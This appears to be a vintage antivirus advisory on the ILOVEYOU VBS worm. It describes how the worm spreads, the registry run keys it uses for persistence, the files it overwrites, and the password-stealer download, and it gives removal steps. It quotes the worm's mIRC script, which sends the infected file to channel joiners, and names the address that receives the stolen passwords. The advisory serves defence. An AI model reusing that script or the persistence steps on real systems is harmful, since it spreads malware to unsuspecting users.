Virus Name:

VBS/Lovel

Date Added: 5/4/2000

Virus Information

Discovery Date: 4/4/2000
Origin: Phillipines
Type: Virus
SubType: VbScript
Risk Assessment: High-Outbreak
Minimum Dat: 4077
Minimum Engine: 4.0.35

Virus Characteristics

This worm is a VBS program that is sent attached to an email with the subject ILOVEYOU. The mail caontains the message "kindly check the attached LOVELETTER coming from me."

The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs

If the user runs the attachment the worm runs using the Windows Scripting Host program. This is not normally present on Windows 95 or Windows NT unless Internet Explorer 5 is installed.

When the worm is first run it drops copies of itself in the following places:

  • C:\WINDOWS\SYSTEM\MSKERNEL32.VBS
  • C:\WINDOWS\WIN32DLL.VBS
  • C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS

It also adds the registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ Win32DLL=C:\WINDOWS\Win32DLL.vbs
in order to run the worm at system startup.

The worm replaces the following files:

  • *.JPG
  • *.JPEG
  • *.MP3
  • *.MP2

with copies of itself and it adds the extension .VBS to the original filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would contain the worm.

The worm also overwrites the following files:

  • *.VBS
  • *.VBE
  • *.JS
  • *.JSE
  • *.CSS
  • *.WSH
  • *.SCT
  • *.HTA

with copies of itself and renames the files to *.VBS.

The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and this is then sent to the IRC channels if the mIRC client is installed. This is accomplished by the worm replacing the file SCRIPT.INI with the following script:

[script]
  n0=on 1:JOIN:#:{
  n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM 
  n3=}

After a short delay the worm uses Microsoft Outlook to send copies of itself to all entries in the address book. The mails will be of the same format as the original mail.

This worm also has onother trick up it's sleeve in that it tries to download and install an executable file called WIN-BUGSFIX.EXE from the Internet. This exe file is a password stealing program that will email any cached passwords to the mail address MAILME@SUPER.NET.PH

In order to facilitate this download the worm sets the start-up page of Microsoft Internet Explorer to point to the web-page containing the password stealing trojan.

Symptoms
VirusScan 4.0.3+
Toolkit 8

Method Of Infection
VirusScan 4.0.3+
Toolkit 8

Removal Instructions

Script,Batch,Macro and non memory-resident:
Use specified engine and DAT files for detection and removal.

Note: It is very common for macro viruses to disable options within Office applications for example in Word, the macro protection warning commonly is disabled. After cleaning macro viruses, ensure that your previously set options are again enabled.

PE, Trojan, Internet Worm and memory resident:
Use specified engine and DAT files for detection. To remove, boot to MS-DOS mode or use an emergency boot diskette and use the command line scanner such as "SCANPM C: /CLEAN /ALL"

DAT not yet available: In the event you have this virus, trojan or Internet worm on your system(s) and the specified DAT is not yet available, refer to the documentation posted for submitting a sample to McAfee AVERT for resolution.

Source: http://www.nai.com/

Last updated: 19 June 2000

 
Torna al menu